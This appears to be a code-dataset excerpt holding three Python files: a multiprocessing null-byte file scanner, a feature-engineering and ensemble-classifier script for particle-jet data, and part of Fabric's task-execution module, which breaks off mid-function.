source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
scan.py
|
# -*- coding: utf-8 -*-
from functools import partial
from multiprocessing import Process
import multiprocessing as mp
import sys
import os
import platform
import unicodedata
# https://github.com/pyinstaller/pyinstaller/wiki/Recipe-Multiprocessing
# Module multiprocessing is organized differently in Python 3.4+
try:
# Python 3.4+
if sys.platform.startswith('win'):
import multiprocessing.popen_spawn_win32 as forking
else:
import multiprocessing.popen_fork as forking
except ImportError:
import multiprocessing.forking as forking
if sys.platform.startswith('win'):
# First define a modified version of Popen.
class _Popen(forking.Popen):
def __init__(self, *args, **kw):
if hasattr(sys, 'frozen'):
# We have to set original _MEIPASS2 value from sys._MEIPASS
# to get --onefile mode working.
os.putenv('_MEIPASS2', sys._MEIPASS)
try:
super(_Popen, self).__init__(*args, **kw)
finally:
if hasattr(sys, 'frozen'):
# On some platforms (e.g. AIX) 'os.unsetenv()' is not
# available. In those cases we cannot delete the variable
# but only set it to the empty string. The bootloader
# can handle this case.
if hasattr(os, 'unsetenv'):
os.unsetenv('_MEIPASS2')
else:
os.putenv('_MEIPASS2', '')
# Second override 'Popen' class with our modified version.
forking.Popen = _Popen
def read_in_chunks(file_object, chunk_size=4 * 1024 * 1024):
"""Lazy function (generator) to read a file piece by piece.
Default chunk size: 1k.
"""
while True:
data = file_object.read(chunk_size)
if not data:
break
yield data
def do_work(in_queue, out_queue, null_char):
"""Pulls data from in_queue, counts number of null characters,
and sends result to out_queue.
"""
while True:
null = 0
item = in_queue.get()
for byte in item:
if byte == null_char:
null = null + 1
out_queue.put(null)
in_queue.task_done()
def scan(name, work_queue, result_queue):
"""Loads data into work_queue, then gets results from result_queue."""
try:
with open(name, 'rb') as f:
for i in read_in_chunks(f):
work_queue.put(i)
except IOError:
return 'Error'
else:
work_queue.join()
null_count = sum([result_queue.get()
for i in range(result_queue.qsize())])
return null_count
def create_workers(work_queue, result_queue, null_char=b'\x00'):
"""Generates daemonized worker processes."""
num_workers = mp.cpu_count() - 1
if num_workers < 1:
num_workers = 1
# Start workers
worker_list = []
for i in range(num_workers):
t = Process(target=do_work, args=(work_queue, result_queue, null_char))
worker_list.append(t)
t.daemon = True
t.start()
return worker_list
def scan_target(path, files, directories):
"""
Processes given path.
Adds files to files list.
If path is a directory, all subfiles and directories are added to
the files and directories lists as appropriate.
Returns list of files and list of directories.
"""
path = os.path.abspath(path)
if not os.path.isdir(path):
files.append(path)
return files, directories
directory_list = [
unicodedata.normalize('NFC', f) for f in os.listdir(path)]
for entry in directory_list:
entry_path = os.path.join(path, entry)
if os.path.isdir(entry_path):
directories.append(entry_path)
else:
files.append(entry_path)
return files, directories
|
baseline_merge.py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 17 19:59:45 2019
@author: jack
"""
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
# import xgboost as xgb
from sklearn.model_selection import StratifiedKFold
import gc
import os
from keras.utils import to_categorical
from sklearn.metrics import classification_report
from catboost import CatBoostRegressor, CatBoostClassifier
from xgboost import XGBClassifier
import pandas as pd
from imblearn.over_sampling import SMOTE
import numpy as np
import xgboost as xgb
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import GradientBoostingClassifier
from lightgbm import LGBMRegressor
from sklearn.metrics import mean_squared_error
from sklearn.model_selection import GridSearchCV
from sklearn.externals import joblib
from sklearn import svm
from multiprocessing import Pool
import math
from xgboost import XGBClassifier
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 500)
def count_column(df,column):
tp = df.groupby(column).count().reset_index()
tp = tp[list(tp.columns)[0:2]]
tp.columns = [column, column+'_count']
df=df.merge(tp,on=column,how='left')
return df
def count_mean(df,base_column,count_column):
tp = df.groupby(base_column).agg({count_column: ['mean']}).reset_index()
tp.columns = [base_column, base_column+'_'+count_column+'_mean']
df = df.merge(tp, on=base_column, how='left')
return df
def count_count(df,base_column,count_column):
tp = df.groupby(base_column).agg({count_column: ['count']}).reset_index()
tp.columns = [base_column, base_column+'_'+count_column+'_count']
df = df.merge(tp, on=base_column, how='left')
return df
def count_sum(df,base_column,count_column):
tp = df.groupby(base_column).agg({count_column: ['sum']}).reset_index()
tp.columns = [base_column, base_column+'_'+count_column+'_sum']
df = df.merge(tp, on=base_column, how='left')
return df
def count_std(df,base_column,count_column):
tp = df.groupby(base_column).agg({count_column: ['std']}).reset_index()
tp.columns = [base_column, base_column+'_'+count_column+'_std']
df = df.merge(tp, on=base_column, how='left')
return df
train=pd.read_csv('./data/simple_train_R04_jet.csv')#,encoding = 'UTF-8')
test=pd.read_csv('./data/simple_test_R04_jet.csv')#,encoding = 'UTF-8')
def energy(df):
x=df['jet_px']
y=df['jet_py']
z= df['jet_pz']
return (x**2+y**2+z**2)**0.5
train['energy']=train.apply(energy,axis=1)
test['energy']=test.apply(energy,axis=1)
train['x_n']=train['jet_px']/train['energy']
train['y_n']=train['jet_py']/train['energy']
train['z_n']=train['jet_pz']/train['energy']
test['x_n']=test['jet_px']/test['energy']
test['y_n']=test['jet_py']/test['energy']
test['z_n']=test['jet_pz']/test['energy']
def x_sub_mean_del_std(df):
df_mean = df.mean()
df_std = df.std()
return df.apply(lambda x:(x-df_mean) / df_std)
train['energy_sub_mean_del_std'] = x_sub_mean_del_std(train['jet_energy'])
test['energy_sub_mean_del_std'] = x_sub_mean_del_std(test['jet_energy'])
train=count_mean(train,'event_id','energy_sub_mean_del_std')
train=count_sum(train,'event_id','energy_sub_mean_del_std')
train=count_std(train,'event_id','energy_sub_mean_del_std')
train=count_count(train,'event_id','energy_sub_mean_del_std')
test=count_mean(test,'event_id','energy_sub_mean_del_std')
test=count_sum(test,'event_id','energy_sub_mean_del_std')
test=count_std(test,'event_id','energy_sub_mean_del_std')
test=count_count(test,'event_id','energy_sub_mean_del_std')
train['mass_sub_mean_del_std'] = x_sub_mean_del_std(train['jet_mass'])
test['mass_sub_mean_del_std'] = x_sub_mean_del_std(test['jet_mass'])
train=count_mean(train,'event_id','mass_sub_mean_del_std')
train=count_sum(train,'event_id','mass_sub_mean_del_std')
train=count_std(train,'event_id','mass_sub_mean_del_std')
train=count_count(train,'event_id','mass_sub_mean_del_std')
test=count_mean(test,'event_id','mass_sub_mean_del_std')
test=count_sum(test,'event_id','mass_sub_mean_del_std')
test=count_std(test,'event_id','mass_sub_mean_del_std')
test=count_count(test,'event_id','mass_sub_mean_del_std')
# def danwei(df):
# # df_max = df.max()
# # df_min = df.min()
# # x = df['jet_px']
# # y = df['jet_py']
# # z = df['jet_pz']
# x_norm = df.apply(lambda x: x['jet_px']/(x['jet_px']**2+x['jet_py']**2+x['jet_pz']**2 )**0.5)
# y_norm = df.apply(lambda x: x['jet_py']/(x['jet_px']**2+x['jet_py']**2+x['jet_pz']**2 )**0.5)
# z_norm = df.apply(lambda x: x['jet_pz']/(x['jet_px']**2+x['jet_py']**2+x['jet_pz']**2 )**0.5)
# return x_norm,y_norm,z_norm
train['distence'] = (train['jet_px']**2 + train['jet_py']**2 + train['jet_pz']**2)**0.5
train['x_d'] = train['jet_px'] / train['distence']
train['y_d'] = train['jet_py'] / train['distence']
train['z_d'] = train['jet_pz'] / train['distence']
# train['y_d'] = danwei(train['jet_py'])
# train['z_d'] = danwei(train['jet_pz'])
#train['x_d'],train['y_d'],train['z_d'] = danwei(train)
#test['x_d'] = danwei(test['jet_px'])
#test['y_d'] = danwei(test['jet_py'])
#test['z_d'] = danwei(test['jet_pz'])
#test['x_d'],test['y_d'],test['z_d'] = danwei(test)
test['distence'] = (test['jet_px']**2 + test['jet_py']**2 + test['jet_pz']**2)**0.5
test['x_d'] = test['jet_px'] / test['distence']
test['y_d'] = test['jet_py'] / test['distence']
test['z_d'] = test['jet_pz'] / test['distence']
train['x_energy'] = train['x_d'] * train['jet_energy']
train['y_energy'] = train['y_d'] * train['jet_energy']
train['z_energy'] = train['z_d'] * train['jet_energy']
test['x_energy'] = test['x_d'] * test['jet_energy']
test['y_energy'] = test['y_d'] * test['jet_energy']
test['z_energy'] = test['z_d'] * test['jet_energy']
train=count_mean(train,'event_id','distence')
train=count_sum(train,'event_id','distence')
train=count_std(train,'event_id','distence')
train=count_count(train,'event_id','distence')
test=count_mean(test,'event_id','distence')
test=count_sum(test,'event_id','distence')
test=count_std(test,'event_id','distence')
test=count_count(test,'event_id','distence')
train=count_mean(train,'event_id','x_energy')
train=count_sum(train,'event_id','x_energy')
train=count_std(train,'event_id','x_energy')
train=count_count(train,'event_id','x_energy')
train=count_mean(train,'event_id','y_energy')
train=count_sum(train,'event_id','y_energy')
train=count_std(train,'event_id','y_energy')
train=count_count(train,'event_id','y_energy')
train=count_mean(train,'event_id','z_energy')
train=count_sum(train,'event_id','z_energy')
train=count_std(train,'event_id','z_energy')
train=count_count(train,'event_id','z_energy')
test=count_mean(test,'event_id','x_energy')
test=count_sum(test,'event_id','x_energy')
test=count_std(test,'event_id','x_energy')
test=count_count(test,'event_id','x_energy')
test=count_mean(test,'event_id','y_energy')
test=count_sum(test,'event_id','y_energy')
test=count_std(test,'event_id','y_energy')
test=count_count(test,'event_id','y_energy')
test=count_mean(test,'event_id','z_energy')
test=count_sum(test,'event_id','z_energy')
test=count_std(test,'event_id','z_energy')
test=count_count(test,'event_id','z_energy')
train=count_mean(train,'event_id','x_d')
train=count_sum(train,'event_id','x_d')
train=count_std(train,'event_id','x_d')
train=count_count(train,'event_id','x_d')
train=count_mean(train,'event_id','y_d')
train=count_sum(train,'event_id','y_d')
train=count_std(train,'event_id','y_d')
train=count_count(train,'event_id','y_d')
train=count_mean(train,'event_id','z_d')
train=count_sum(train,'event_id','z_d')
train=count_std(train,'event_id','z_d')
train=count_count(train,'event_id','z_d')
test=count_mean(test,'event_id','x_d')
test=count_sum(test,'event_id','x_d')
test=count_std(test,'event_id','x_d')
test=count_count(test,'event_id','x_d')
test=count_mean(test,'event_id','y_d')
test=count_sum(test,'event_id','y_d')
test=count_std(test,'event_id','y_d')
test=count_count(test,'event_id','y_d')
test=count_mean(test,'event_id','z_d')
test=count_sum(test,'event_id','z_d')
test=count_std(test,'event_id','z_d')
test=count_count(test,'event_id','z_d')
train=count_mean(train,'event_id','x_n')
train=count_sum(train,'event_id','x_n')
train=count_std(train,'event_id','x_n')
train=count_count(train,'event_id','x_n')
train=count_mean(train,'event_id','y_n')
train=count_sum(train,'event_id','y_n')
train=count_std(train,'event_id','y_n')
train=count_count(train,'event_id','y_n')
train=count_mean(train,'event_id','z_n')
train=count_sum(train,'event_id','z_n')
train=count_std(train,'event_id','z_n')
train=count_count(train,'event_id','z_n')
test=count_mean(test,'event_id','x_n')
test=count_sum(test,'event_id','x_n')
test=count_std(test,'event_id','x_n')
test=count_count(test,'event_id','x_n')
test=count_mean(test,'event_id','y_n')
test=count_sum(test,'event_id','y_n')
test=count_std(test,'event_id','y_n')
test=count_count(test,'event_id','y_n')
test=count_mean(test,'event_id','z_n')
test=count_sum(test,'event_id','z_n')
test=count_std(test,'event_id','z_n')
test=count_count(test,'event_id','z_n')
train['abs']=train['jet_energy']-train['energy']
test['abs']=test['jet_energy']-test['energy']
train['energy_sum'] = train['jet_energy']+train['energy']
test['energy_sum'] = test['jet_energy']+test['energy']
train['energy_every'] = train['energy_sum'] / train['number_of_particles_in_this_jet']
test['energy_every'] = test['energy_sum'] / test['number_of_particles_in_this_jet']
train['mul_energy_mass'] = train['jet_energy'] * train['jet_mass']
test['mul_energy_mass'] = test['jet_energy'] * test['jet_mass']
train['V'] = train['jet_energy'] / train['jet_mass']
test['V'] = test['jet_energy'] / test['jet_mass']
train['mvv'] = train['V']**2 * train['jet_mass']
test['mvv'] = test['V']**2 * test['jet_mass']
train = count_mean(train,'event_id','mvv')
train = count_sum(train,'event_id','mvv')
train = count_std(train,'event_id','mvv')
train = count_count(train,'event_id','mvv')
test = count_mean(test,'event_id','mvv')
test = count_sum(test,'event_id','mvv')
test = count_std(test,'event_id','mvv')
test = count_count(test,'event_id','mvv')
train = count_mean(train,'event_id','V')
train = count_sum(train,'event_id','V')
train = count_std(train,'event_id','V')
train = count_count(train,'event_id','V')
test = count_mean(test,'event_id','V')
test = count_sum(test,'event_id','V')
test = count_std(test,'event_id','V')
test = count_count(test,'event_id','V')
train['x_v'] = train['V'] / train['jet_px']
train['y_v'] = train['V'] / train['jet_py']
train['z_v'] = train['V'] / train['jet_pz']
test['x_v'] = test['V'] / test['jet_px']
test['y_v'] = test['V'] / test['jet_py']
test['z_v'] = test['V'] / test['jet_pz']
train = count_mean(train,'event_id','x_v')
train = count_sum(train,'event_id','x_v')
train = count_std(train,'event_id','x_v')
train = count_count(train,'event_id','x_v')
train = count_mean(train,'event_id','y_v')
train = count_sum(train,'event_id','y_v')
train = count_std(train,'event_id','y_v')
train = count_count(train,'event_id','y_v')
train = count_mean(train,'event_id','z_v')
train = count_sum(train,'event_id','z_v')
train = count_std(train,'event_id','z_v')
train = count_count(train,'event_id','z_v')
test = count_mean(test,'event_id','x_v')
test = count_sum(test,'event_id','x_v')
test = count_std(test,'event_id','x_v')
test = count_count(test,'event_id','x_v')
test = count_mean(test,'event_id','y_v')
test = count_sum(test,'event_id','y_v')
test = count_std(test,'event_id','y_v')
test = count_count(test,'event_id','y_v')
test = count_mean(test,'event_id','z_v')
test = count_sum(test,'event_id','z_v')
test = count_std(test,'event_id','z_v')
test = count_count(test,'event_id','z_v')
train = count_mean(train,'event_id','mul_energy_mass')
train = count_sum(train,'event_id','mul_energy_mass')
train = count_std(train,'event_id','mul_energy_mass')
train = count_count(train,'event_id','mul_energy_mass')
test = count_mean(test,'event_id','mul_energy_mass')
test = count_sum(test,'event_id','mul_energy_mass')
test = count_std(test,'event_id','mul_energy_mass')
test = count_count(test,'event_id','mul_energy_mass')
train = count_mean(train,'event_id','energy_every')
train = count_sum(train,'event_id','energy_every')
train = count_std(train,'event_id','energy_every')
train = count_count(train,'event_id','energy_every')
test = count_mean(test,'event_id','energy_every')
test = count_sum(test,'event_id','energy_every')
test = count_std(test,'event_id','energy_every')
test = count_count(test,'event_id','energy_every')
train = count_mean(train,'event_id','energy_sum')
train = count_sum(train,'event_id','energy_sum')
train = count_std(train,'event_id','energy_sum')
train = count_count(train,'event_id','energy_sum')
test = count_mean(test,'event_id','energy_sum')
test = count_sum(test,'event_id','energy_sum')
test = count_std(test,'event_id','energy_sum')
test = count_count(test,'event_id','energy_sum')
train=count_mean(train,'event_id','number_of_particles_in_this_jet')
train=count_sum(train,'event_id','number_of_particles_in_this_jet')
train=count_std(train,'event_id','number_of_particles_in_this_jet')
train=count_count(train,'event_id','number_of_particles_in_this_jet')
train=count_mean(train,'event_id','jet_mass')
train=count_sum(train,'event_id','jet_mass')
train=count_std(train,'event_id','jet_mass')
train=count_count(train,'event_id','jet_mass')
train=count_mean(train,'event_id','jet_energy')
train=count_sum(train,'event_id','jet_energy')
train=count_std(train,'event_id','jet_energy')
train=count_count(train,'event_id','jet_energy')
train['mean_energy']=train['jet_energy']/train['number_of_particles_in_this_jet']
train['mean_jet_mass']=train['jet_mass']/train['number_of_particles_in_this_jet']
train=count_mean(train,'event_id','mean_energy')
train=count_sum(train,'event_id','mean_energy')
train=count_std(train,'event_id','mean_energy')
train=count_count(train,'event_id','mean_energy')
train=count_mean(train,'event_id','mean_jet_mass')
train=count_sum(train,'event_id','mean_jet_mass')
train=count_std(train,'event_id','mean_jet_mass')
train=count_count(train,'event_id','mean_jet_mass')
train=count_mean(train,'event_id','abs')
train=count_sum(train,'event_id','abs')
train=count_std(train,'event_id','abs')
train=count_count(train,'event_id','abs')
train=count_mean(train,'event_id','energy')
train=count_sum(train,'event_id','energy')
train=count_std(train,'event_id','energy')
train=count_count(train,'event_id','energy')
test=count_mean(test,'event_id','number_of_particles_in_this_jet')
test=count_sum(test,'event_id','number_of_particles_in_this_jet')
test=count_std(test,'event_id','number_of_particles_in_this_jet')
test=count_count(test,'event_id','number_of_particles_in_this_jet')
test=count_mean(test,'event_id','jet_mass')
test=count_sum(test,'event_id','jet_mass')
test=count_std(test,'event_id','jet_mass')
test=count_count(test,'event_id','jet_mass')
test=count_mean(test,'event_id','jet_energy')
test=count_sum(test,'event_id','jet_energy')
test=count_std(test,'event_id','jet_energy')
test=count_count(test,'event_id','jet_energy')
test['mean_energy']=test['jet_energy']/test['number_of_particles_in_this_jet']
test['mean_jet_mass']=test['jet_mass']/test['number_of_particles_in_this_jet']
test=count_mean(test,'event_id','mean_energy')
test=count_sum(test,'event_id','mean_energy')
test=count_std(test,'event_id','mean_energy')
test=count_count(test,'event_id','mean_energy')
test=count_mean(test,'event_id','mean_jet_mass')
test=count_sum(test,'event_id','mean_jet_mass')
test=count_std(test,'event_id','mean_jet_mass')
test=count_count(test,'event_id','mean_jet_mass')
test=count_mean(test,'event_id','abs')
test=count_sum(test,'event_id','abs')
test=count_std(test,'event_id','abs')
test=count_count(test,'event_id','abs')
test=count_mean(test,'event_id','energy')
test=count_sum(test,'event_id','energy')
test=count_std(test,'event_id','energy')
test=count_count(test,'event_id','energy')
#d={1:[1,0,0,0,],4:[0,1,0,0],5:[0,0,1,0],21:[0,0,0,1]}
d={1:0,4:1,5:2,21:3}
def label_process(x):
x=d[x]
return x
train['label']=train['label'].apply(label_process)
#train_y=train.pop('label').values
#train_y=np.array(list(train_y))
_=train.pop('jet_id')
test_id=test.pop('jet_id')
_=train.pop('event_id')
_=test.pop('event_id')
#train=train.values
#test=test.values
#train.to_csv('train_xy.csv')
train_target_21 = train[train.label==3]
train_target_1 = train[train.label==0]
train_target_4 = train[train.label==1]
train_target_5 = train[train.label==2]
print(train_target_21.shape)
print(train_target_1.shape)
print(train_target_4.shape)
print(train_target_5.shape)
#test_data = pd.read_csv(test_path,index_col="id")
xgb = XGBClassifier(nthread=16)
res = pd.DataFrame(index=test.index,columns=['id','label'])
#train_p = pd.DataFrame(index=train_data.index)
'''
21 358600
1 261207
4 260186
5 254562
Name: label, dtype: int64
'''
estimator = LGBMRegressor(num_leaves=31)
param_grid = {
'learning_rate': [0.01, 0.1, 1],
'n_estimators': [20, 40]
}
#xgb = GridSearchCV(xgb, param_grid, scoring='roc_auc')
xgb_param_dist = {'n_estimators':range(80,200,4),'max_depth':range(2,15,1),'learning_rate':np.linspace(0.01,2,20),'subsample':np.linspace(0.7,0.9,20),'colsample_bytree':np.linspace(0.5,0.98,10),'min_child_weight':range(1,9,1)}
gbm = GridSearchCV(estimator, param_grid)
gbdt = GradientBoostingClassifier(random_state=10)
catboost = CatBoostClassifier(
iterations=2000,
od_type='Iter',
od_wait=120,
max_depth=10,
learning_rate=0.02,
l2_leaf_reg=9,
random_seed=2019,
metric_period=50,
fold_len_multiplier=1.1,
loss_function='MultiClass',
logging_level='Verbose'
)
rfc = RandomForestClassifier(random_state=0)
def train(ite):
print(i)
data = train_target_21.sample(254562)#数据显示1 :0 = 17:2(》0.5)
data = data.append(train_target_1.sample(254562))
data = data.append(train_target_4.sample(254562))
data = data.append(train_target_5.sample(254562))
y_ = data.label
del data['label']
if ite%3== 0:
arg = xgb
if ite%3==1:
arg = gbm
if ite % 3 == 2:
arg = catboost
# if ite % 4 == 3:
# arg = rfc
arg.fit(data,y_)
# train_p[ite] = xgb.predict(train_data)
res[ite] = arg.predict(test)
del arg
gc.collect()
#import threading
#print('start')
#for i in range(3):
# for j in range(4):
# threading.Thread(target=run, args=(i*3+j,)).start()
#print('end')
#
for i in range(30):
train(i)
sub=pd.DataFrame()
res = res.apply(lambda x: x.value_counts().index[0],axis =1)
res = res.apply(lambda x: int(x))
dd={0:1,1:4,2:5,3:21}
def sub_process(x):
x=dd[x]
return x
sub['label']=list(res)
sub['label']=sub['label'].apply(sub_process)
sub['id']=list(test_id)
#a = resT.apply(sum)
#a/3
#b= a/3
#c=pd.DataFrame(b)
res.to_csv('xgb_balence.csv')
sub.to_csv('sub_baseline.csv')
|
tasks.py
|
from __future__ import with_statement
import inspect
import sys
import textwrap
from fabric import state
from fabric.utils import abort, warn, error
from fabric.network import to_dict, normalize_to_string, disconnect_all
from fabric.context_managers import settings
from fabric.job_queue import JobQueue
from fabric.task_utils import crawl, merge, parse_kwargs
from fabric.exceptions import NetworkError
if sys.version_info[:2] == (2, 5):
# Python 2.5 inspect.getargspec returns a tuple
# instead of ArgSpec namedtuple.
class ArgSpec(object):
def __init__(self, args, varargs, keywords, defaults):
self.args = args
self.varargs = varargs
self.keywords = keywords
self.defaults = defaults
self._tuple = (args, varargs, keywords, defaults)
def __getitem__(self, idx):
return self._tuple[idx]
def patched_get_argspec(func):
return ArgSpec(*inspect._getargspec(func))
inspect._getargspec = inspect.getargspec
inspect.getargspec = patched_get_argspec
def get_task_details(task):
details = [
textwrap.dedent(task.__doc__)
if task.__doc__
else 'No docstring provided']
argspec = inspect.getargspec(task)
default_args = [] if not argspec.defaults else argspec.defaults
num_default_args = len(default_args)
args_without_defaults = argspec.args[:len(argspec.args) - num_default_args]
args_with_defaults = argspec.args[-1 * num_default_args:]
details.append('Arguments: %s' % (
', '.join(
args_without_defaults + [
'%s=%r' % (arg, default)
for arg, default in zip(args_with_defaults, default_args)
])
))
return '\n'.join(details)
def _get_list(env):
def inner(key):
return env.get(key, [])
return inner
class Task(object):
"""
Abstract base class for objects wishing to be picked up as Fabric tasks.
Instances of subclasses will be treated as valid tasks when present in
fabfiles loaded by the :doc:`fab </usage/fab>` tool.
For details on how to implement and use `~fabric.tasks.Task` subclasses,
please see the usage documentation on :ref:`new-style tasks
<new-style-tasks>`.
.. versionadded:: 1.1
"""
name = 'undefined'
use_task_objects = True
aliases = None
is_default = False
# TODO: make it so that this wraps other decorators as expected
def __init__(self, alias=None, aliases=None, default=False, name=None,
*args, **kwargs):
if alias is not None:
self.aliases = [alias, ]
if aliases is not None:
self.aliases = aliases
if name is not None:
self.name = name
self.is_default = default
def __details__(self):
return get_task_details(self.run)
def run(self):
raise NotImplementedError
def get_hosts(self, arg_hosts, arg_roles, arg_exclude_hosts, env=None):
"""
Return the host list the given task should be using.
See :ref:`host-lists` for detailed documentation on how host lists are
set.
"""
env = env or {'hosts': [], 'roles': [], 'exclude_hosts': []}
roledefs = env.get('roledefs', {})
# Command line per-task takes precedence over anything else.
if arg_hosts or arg_roles:
return merge(arg_hosts, arg_roles, arg_exclude_hosts, roledefs)
# Decorator-specific hosts/roles go next
func_hosts = getattr(self, 'hosts', [])
func_roles = getattr(self, 'roles', [])
if func_hosts or func_roles:
return merge(func_hosts, func_roles, arg_exclude_hosts, roledefs)
# Finally, the env is checked (which might contain globally set lists
# from the CLI or from module-level code). This will be the empty list
# if these have not been set -- which is fine, this method should
# return an empty list if no hosts have been set anywhere.
env_vars = map(_get_list(env), "hosts roles exclude_hosts".split())
env_vars.append(roledefs)
return merge(*env_vars)
def get_pool_size(self, hosts, default):
# Default parallel pool size (calculate per-task in case variables
# change)
default_pool_size = default or len(hosts)
# Allow per-task override
# Also cast to int in case somebody gave a string
from_task = getattr(self, 'pool_size', None)
pool_size = int(from_task or default_pool_size)
# But ensure it's never larger than the number of hosts
pool_size = min((pool_size, len(hosts)))
# Inform user of final pool size for this task
if state.output.debug:
print("Parallel tasks now using pool size of %d" % pool_size)
return pool_size
class WrappedCallableTask(Task):
"""
Wraps a given callable transparently, while marking it as a valid Task.
Generally used via `~fabric.decorators.task` and not directly.
.. versionadded:: 1.1
.. seealso:: `~fabric.docs.unwrap_tasks`, `~fabric.decorators.task`
"""
def __init__(self, callable, *args, **kwargs):
super(WrappedCallableTask, self).__init__(*args, **kwargs)
self.wrapped = callable
# Don't use getattr() here -- we want to avoid touching self.name
# entirely so the superclass' value remains default.
if hasattr(callable, '__name__'):
if self.name == 'undefined':
self.__name__ = self.name = callable.__name__
else:
self.__name__ = self.name
if hasattr(callable, '__doc__'):
self.__doc__ = callable.__doc__
if hasattr(callable, '__module__'):
self.__module__ = callable.__module__
def __call__(self, *args, **kwargs):
return self.run(*args, **kwargs)
def run(self, *args, **kwargs):
return self.wrapped(*args, **kwargs)
def __getattr__(self, k):
return getattr(self.wrapped, k)
def __details__(self):
return get_task_details(self.wrapped)
def requires_parallel(task):
"""
Returns True if given ``task`` should be run in parallel mode.
Specifically:
* It's been explicitly marked with ``@parallel``, or:
* It's *not* been explicitly marked with ``@serial`` *and* the global
parallel option (``env.parallel``) is set to ``True``.
"""
return (
(state.env.parallel and not getattr(task, 'serial', False))
or getattr(task, 'parallel', False)
)
def _parallel_tasks(commands_to_run):
return any(map(
lambda x: requires_parallel(crawl(x[0], state.commands)),
commands_to_run
))
def parallel_task_target(task, args, kwargs, env, queue):
"""
Wrap in another callable that:
* nukes the connection cache to prevent shared-access problems
* knows how to send the tasks' return value back over a Queue
* captures exceptions raised by the task
"""
from fabric import state as _state
from fabric.network import HostConnectionCache
# Reset all connections from pre-fork
_state.connections = HostConnectionCache()
def submit(result):
queue.put({'name': env.host_string, 'result': result})
try:
with settings(**env):
submit(task.run(*args, **kwargs))
except BaseException, e: # We really do want to capture everything
# SystemExit implies use of abort(), which prints its own
# traceback, host info etc -- so we don't want to double up
# on that. For everything else, though, we need to make
# clear what host encountered the exception that will
# print.
if e.__class__ is not SystemExit:
print >> sys.stderr, "!!! Parallel execution exception under host %r:" % env.host_string
submit(e)
# Here, anything -- unexpected exceptions, or abort()
# driven SystemExits -- will bubble up and terminate the
# child process.
raise
def _execute(task, host, my_env, args, kwargs, jobs, queue, multiprocessing):
"""
Primary single-host work body of execute()
"""
# Log to stdout
if state.output.running and not hasattr(task, 'return_value'):
print("[%s] Executing task '%s'" % (host, my_env['command']))
# Create per-run env with connection settings
local_env = to_dict(host)
local_env.update(my_env)
# Set a few more env flags for parallelism
if queue is not None:
local_env.update({'parallel': True, 'linewise': True})
# Handle parallel execution
if queue is not None: # Since queue is only set for parallel
name = local_env['host_string']
# Wrap in another callable that:
# * expands the env it's given to ensure parallel, linewise, etc are
# all set correctly and explicitly. Such changes are naturally
# insulted from the parent process.
# * nukes the connection cache to prevent shared-access problems
# * knows how to send the tasks' return value back over a Queue
# * captures exceptions raised by the task
def inner(args, kwargs, queue, name, env):
state.env.update(env)
def submit(result):
queue.put({'name': name, 'result': result})
try:
key = normalize_to_string(state.env.host_string)
state.connections.pop(key, "")
submit(task.run(*args, **kwargs))
except BaseException, e: # We really do want to capture everything
# SystemExit implies use of abort(), which prints its own
# traceback, host info etc -- so we don't want to double up
# on that. For everything else, though, we need to make
# clear what host encountered the exception that will
# print.
if e.__class__ is not SystemExit:
sys.stderr.write("!!! Parallel execution exception under host %r:\n" % name)
submit(e)
# Here, anything -- unexpected exceptions, or abort()
# driven SystemExits -- will bubble up and terminate the
# child process.
raise
# Stuff into Process wrapper
kwarg_dict = {
'args': args,
'kwargs': kwargs,
'queue': queue,
'name': name,
'env': local_env,
}
p = multiprocessing.Process(target=inner, kwargs=kwarg_dict)
# Name/id is host string
p.name = name
# Add to queue
jobs.append(p)
# Handle serial execution
else:
with settings(**local_env):
return task.run(*args, **kwargs)
def _is_task(task):
return isinstance(task, Task)
def execute(task, *args, **kwargs):
"""
Execute ``task`` (callable or name), honoring host/role decorators, etc.
``task`` may be an actual callable object, or it may be a registered task
name, which is used to look up a callable just as if the name had been
given on the command line (including :ref:`namespaced tasks <namespaces>`,
e.g. ``"deploy.migrate"``.
The task will then be executed once per host in its host list, which is
(again) assembled in the same manner as CLI-specified tasks: drawing from
:option:`-H`, :ref:`env.hosts <hosts>`, the `~fabric.decorators.hosts` or
`~fabric.decorators.roles` decorators, and so forth.
``host``, ``hosts``, ``role``, ``roles`` and ``exclude_hosts`` kwargs will
be stripped out of the final call, and used to set the task's host list, as
if they had been specified on the command line like e.g. ``fab
taskname:host=hostname``.
Any other arguments or keyword arguments will be passed verbatim into
``task`` (the function itself -- not the ``@task`` decorator wrapping your
function!) when it is called, so ``execute(mytask, 'arg1',
kwarg1='value')`` will (once per host) invoke ``mytask('arg1',
kwarg1='value')``.
:returns:
a dictionary mapping host strings to the given task's return value for
that host's execution run. For example, ``execute(foo, hosts=['a',
'b'])`` might return ``{'a': None, 'b': 'bar'}`` if ``foo`` returned
nothing on host `a` but returned ``'bar'`` on host `b`.
In situations where a task execution fails for a given host but overall
progress does not abort (such as when :ref:`env.skip_bad_hosts
<skip-bad-hosts>` is True) the return value for that host will be the
error object or message.
.. seealso::
:ref:`The execute usage docs <execute>`, for an expanded explanation
and some examples.
.. versionadded:: 1.3
.. versionchanged:: 1.4
Added the return value mapping; previously this function had no defined
return value.
"""
my_env = {'clean_revert': True}
results = {}
# Obtain task
if not (callable(task) or _is_task(task)):
# Assume string, set env.command to it
my_env['command'] = task
task = crawl(task, state.commands)
if task is None:
abort("%r is not callable or a valid task name" % (task,))
# Set env.command if we were given a real function or callable task obj
else:
dunder_name = getattr(task, '__name__', None)
my_env['command'] = getattr(task, 'name', dunder_name)
# Normalize to Task instance if we ended up with a regular callable
if not _is_task(task):
task = WrappedCallableTask(task)
# Filter out hosts/roles kwargs
new_kwargs, hosts, roles, exclude_hosts = parse_kwargs(kwargs)
# Set up host list
my_env['all_hosts'] = task.get_hosts(hosts, roles, exclude_hosts, state.env)
parallel = requires_parallel(task)
if parallel:
# Import multiprocessing if needed, erroring out usefully
# if it can't.
try:
import multiprocessing
except ImportError:
import traceback
tb = traceback.format_exc()
abort(tb + """
At least one task needs to be run in parallel, but the
multiprocessing module cannot be imported (see above
traceback.) Please make sure the module is installed
or that the above ImportError is fixed.""")
else:
multiprocessing = None
# Get pool size for this task
pool_size = task.get_pool_size(my_env['all_hosts'], state.env.pool_size)
# Set up job queue in case parallel is needed
queue = multiprocessing.Queue() if parallel else None
role_limits = state.env.get('role_limits', None)
